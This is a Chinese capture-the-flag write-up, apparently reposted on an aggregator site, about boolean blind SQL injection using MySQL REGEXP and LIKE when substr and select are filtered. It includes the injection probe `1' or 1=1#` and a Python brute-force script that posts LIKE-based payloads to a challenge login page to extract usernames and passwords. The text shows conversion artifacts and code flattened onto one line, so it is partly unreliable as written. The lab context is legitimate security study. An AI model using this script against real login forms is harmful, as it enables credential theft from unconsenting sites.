前言：

之前的布爾盲注都是在很正常的情況下進(jìn)行注入，這次做了一道布爾盲注的題目，學(xué)到了不少知識(shí)，記錄一下。

0x00:regexp正則表達(dá)式注入

測(cè)試發(fā)現(xiàn)username=1' or 1=1#時(shí)回顯密碼錯(cuò)誤，密碼測(cè)試?yán)@不過去，使用布爾盲注試試

沒有反應(yīng)，說明應(yīng)該是substr函數(shù)被禁用了，那該怎么進(jìn)行猜測(cè)，之前的方法都是通過這個(gè)函數(shù)進(jìn)行截取然后判斷，既然給禁用了就說明應(yīng)該還有其他的函數(shù)可以進(jìn)行猜測(cè)，查來查去發(fā)現(xiàn)：

MySQL 同樣也支持其他正則表達(dá)式的匹配， MySQL中使用 REGEXP 操作符來進(jìn)行正則表達(dá)式匹配

那嘗試一下regexp，看看是否可以使用,使用爆破看看是否會(huì)出現(xiàn)密碼錯(cuò)誤，如果出現(xiàn)則說明這個(gè)函數(shù)是可以使用：

生成一個(gè)字典跑一下：

爆破發(fā)現(xiàn)，有兩個(gè)長(zhǎng)度確實(shí)不一樣

故這函數(shù)是可以使用的，而且user()的第一個(gè)字符確實(shí)是u或U,最終爆出來是user

那么數(shù)據(jù)庫(kù)也可以爆出來，但是這里測(cè)試了一下 order、select等函數(shù)都被禁用了，所以也就不用往下面測(cè)試了，就算得出了數(shù)據(jù)庫(kù)也沒辦法進(jìn)行下一步，到這里觀察一下頁(yè)面源碼，發(fā)現(xiàn)：

這不是賬號(hào)密碼對(duì)應(yīng)的字段嗎？，直接通過這里就可以繼續(xù)猜測(cè)：

爆破出一個(gè)字符便加進(jìn)去繼續(xù)爆破，爆破密碼只需將字段給換了即可，登陸進(jìn)行就是git泄露,后面的就不寫了。

腳本如下：

0x01：SQL LIKE 操作符注入

之前看過大師傅的WP，也嘗試了這個(gè)like操作符，就也來嘗試一下

都是在字段中進(jìn)行匹配看是否又對(duì)應(yīng)的值，嘗試一下：

發(fā)現(xiàn)是可以的，那將上面的腳本更改一下payload即可：

import string import requestsurl = 'http://6cb7a820708242519c095809f4e3a7469f362925822e434d.changame.ichunqiu.com/Challenges/login.php' headers = {'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"} #ascii_letters生成所有字母,digits生成所有數(shù)字0-9 payloads = string.ascii_letters + string.digits temp = '' for i in range(40):#爆破用戶名或密碼print("username:")for p in payloads:payload = temp + p#判斷p3ss_w0rd字段中是否存在payload中所包含的字符#LIKE 操作符用于在 WHERE 子句中搜索列中的指定模式name = "admin' or user_n3me like '{}%' ;#".format(payload)data = dict(username=name, passwrod='test')res = requests.post(url, headers=headers, data=data)if (len(res.content) == 12):temp = temp + p#ljust() 方法返回一個(gè)原字符串左對(duì)齊,并使用空格填充至指定長(zhǎng)度的新字符串print(temp.ljust(40, '.'))break

總結(jié)

以上是生活随笔為你收集整理的布尔盲注新姿势的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。